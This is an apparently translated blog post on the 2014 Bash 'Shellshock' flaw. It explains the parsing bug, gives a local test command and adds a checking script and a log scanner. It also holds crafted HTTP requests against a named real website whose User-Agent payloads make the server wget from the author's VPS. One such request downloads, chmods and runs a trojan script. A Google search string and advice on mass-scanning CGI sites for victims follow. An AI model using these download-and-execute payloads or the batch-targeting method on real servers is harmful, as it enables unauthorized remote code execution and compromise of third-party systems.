Bash remote parsing command execution vulnerability Test Method

Source: Internet
Author: User
Tags: vps


Since yesterday, the BASH remote command execution vulnerability, discovered far away in Australia, has had the whole of FreeBuf boiling. Everyone is talking about it: "The heart of the Internet is bleeding again; how do I test my website?" The script that is going around is:

$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

Is it really as simple as everyone says?

Unlike Heartbleed, which could only steal information from a computer, the bash vulnerability lets a hacker remotely control the computer and obtain the highest system privileges! And the method is simpler: just copy and paste a single line of command.

Why can the Bash vulnerability be executed?

Principles of Bash vulnerabilities:

In addition to exporting shell variables as environment variables, BASH can also export shell functions as environment variables! In the current version, bash exports a function definition by using the function name as the environment variable name and a string beginning with "() {" as the environment variable value.

The vulnerability occurs when BASH processes such "function environment variables": it does not stop at the closing "}" of the function body, but goes on to execute the shell commands that follow it.

Simply put, a logic error in how Bash parses certain special strings lets it execute the command that follows them.
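As an added illustration (not part of the original article), the following script first shows the legitimate function-export feature described above and then wraps the test command in a check function that reports whether the local bash is vulnerable; the function names are my own.

```shell
#!/usr/bin/env bash
# Added example: exported shell functions and a local Shellshock check.

# 1) The feature itself: a function exported through the environment is
#    picked up by a child bash. This is normal, intended behaviour.
demo_function_export() {
  command -v bash >/dev/null 2>&1 || { echo "no-bash"; return 2; }
  bash -c 'greet() { echo "hello from exported function"; }; export -f greet; bash -c greet'
}

# 2) The flaw: on an unpatched bash, the text after the function body in the
#    variable value is executed while the environment is imported, so the
#    child bash prints "vulnerable" before running its own -c command.
#    The warning a patched bash prints on stderr is discarded.
check_shellshock() {
  command -v bash >/dev/null 2>&1 || { echo "no-bash"; return 2; }
  out=$(env x='() { :;}; echo vulnerable' bash -c 'echo this is a test' 2>/dev/null)
  case "$out" in
    *vulnerable*) echo "vulnerable"; return 1 ;;
    *)            echo "patched";    return 0 ;;
  esac
}

demo_function_export
check_shellshock
```

On a patched bash the exported function is still imported (now under a BASH_FUNC_ name), while the trailing command in the crafted variable is ignored, so the check prints "patched".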

What is the connection between Bash vulnerability and remote execution?

From the explanation above, many readers will have understood the local vulnerability, and many think it can only be exploited locally, so they ignore this god-level vulnerability. I would say that the exploitation frenzy around this vulnerability can rival that of MS08-067 in its day; although it is somewhat weaker, remote control of a computer is still possible.

First, let me explain CGI scripts. Many websites have links that look like this:

GET http://help.tenpay.com/cgi-bin/helpcenter/help_center.cgi?id=20 HTTP/1.1

On the back end, it is not only Python and Perl that interpret the request and return the Response to the client; bash scripts can also be used to process the submitted GET/POST requests. So, in theory, if you insert a Bash command into an HTTP request, such as

() { :;}; wget http://www.myvps.org/testvul.sh

If the Bash interpreter on the server has this vulnerability, the wget request will be executed when the string above is interpreted, and the malicious testvul.sh will be fetched and run. So how does this end up in the HTTP header? For example:

GET /cgi-bin/helpcenter/help_center.cgi?id=20 HTTP/1.1
Host: help.tenpay.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: */*
Referer: http://www.baidu.com
Connection: keep-alive

This vulnerability is triggered when the bash interpreter interprets certain special variables:
When BASH processes "function environment variables" beginning with "() {", it does not stop at the closing "}" of the function body but runs the shell command that follows.
By supplying the values of these parameters in the form of "function environment variables", the subsequent commands can be triggered; a malicious client only needs to send a specially constructed HTTP request to execute specific commands on the server (with the same privileges as the Bash script environment that interprets the HTTP request).
In actual testing, the request I constructed was:

GET /cgi-bin/helpcenter/help_center.cgi?id=20 HTTP/1.1
Host: help.tenpay.com
User-Agent: () { :;}; /usr/bin/wget http://myvps.org/remember_client_ip.php
Accept: */*
Referer: http://www.baidu.com
Connection: keep-alive

The process is as follows:
I send a GET request to the CGI path on the target server.
When the target server parses this GET request and reaches the value following User-Agent, the Bash interpreter executes the command that follows.
The target server runs wget against my myvps.org.
My VPS records the IP address that accessed it.
I check the access log on my myvps.org server to see whether the target has connected. If it has, the target is vulnerable. The following is the wget access log received by my VPS:

This is how we test the vulnerability.
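From the defender's side, the same probe leaves a trace in the web server's own access log. The following script is an added example, not from the original article: the log lines are constructed samples in Apache combined format, and scan_access_log (my own helper name) flags any entry whose User-Agent or Referer carries the "() {" function-definition prefix.

```shell
#!/usr/bin/env bash
# Added example: spotting Shellshock probes in a web server access log.

# Constructed sample in Apache "combined" format (client, request, status,
# size, Referer, User-Agent). Lines 2 and 3 carry the "() {" prefix in the
# User-Agent and Referer fields; lines 1 and 4 are ordinary traffic.
SAMPLE_LOG='192.0.2.10 - - [25/Sep/2014:10:00:01 +0000] "GET /cgi-bin/help_center.cgi?id=20 HTTP/1.1" 200 512 "http://www.example.com/" "Mozilla/5.0 (X11; Ubuntu; rv:32.0) Gecko/20100101 Firefox/32.0"
198.51.100.7 - - [25/Sep/2014:10:00:05 +0000] "GET /cgi-bin/help_center.cgi?id=20 HTTP/1.1" 200 512 "-" "() { :;}; /usr/bin/wget http://callback.example/remember_client_ip.php"
203.0.113.9 - - [25/Sep/2014:10:00:09 +0000] "GET /cgi-bin/status.cgi HTTP/1.1" 200 128 "() { :; }; /bin/ping -c 1 203.0.113.9" "curl/7.35.0"
192.0.2.10 - - [25/Sep/2014:10:00:12 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"'

# Print every log line (prefixed with its line number) that contains the
# function-definition prefix. The regex tolerates the spacing variants seen
# in the wild: "() {", "(){", "()  {". Reads the files given as arguments,
# or stdin when none are given.
scan_access_log() {
  grep -En '\(\)[[:space:]]*[{]' "$@"
}

# Helpers that run the scanner over the embedded sample.
sample_hit_count() {
  printf '%s\n' "$SAMPLE_LOG" | scan_access_log | wc -l | tr -d ' '
}
# Strip the "N:" line-number prefix, then take the first field (client IP).
sample_sources() {
  printf '%s\n' "$SAMPLE_LOG" | scan_access_log | cut -d: -f2- | awk '{print $1}' | sort -u
}

echo "probes found: $(sample_hit_count)"
echo "probing clients:"
sample_sources
```

Run it as scan_access_log /var/log/apache2/access.log on a real server; a hit only shows that a probe arrived, so the version check from the earlier example still decides whether bash on that host is affected.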

Of course, you can also construct:

GET /cgi-bin/helpcenter/help_center.cgi?id=20 HTTP/1.1
Host: help.tenpay.com
User-Agent: () { :;}; /usr/bin/wget -O /tmp/muma.sh   ;chmod 777 /tmp/muma.sh; ./tmp/muma.sh
Accept: */*
Referer: http://www.baidu.com
Connection: keep-alive

The following three statements are actually executed:

/usr/bin/wget -O /tmp/muma.sh  http://myvps.org/muma.sh ;chmod 777 /tmp/muma.sh; ./tmp/muma.sh

And that is how your Trojan script ends up running, which is the essence of exploiting the Bash vulnerability.

Of course, you can search by Google in batches:

filetype:cgi inurl:cgi-bin site:jp

Then you can submit similar GET requests in bulk for batch testing. Tests show that 6 to 8 of every 500 URLs have the bash vulnerability.
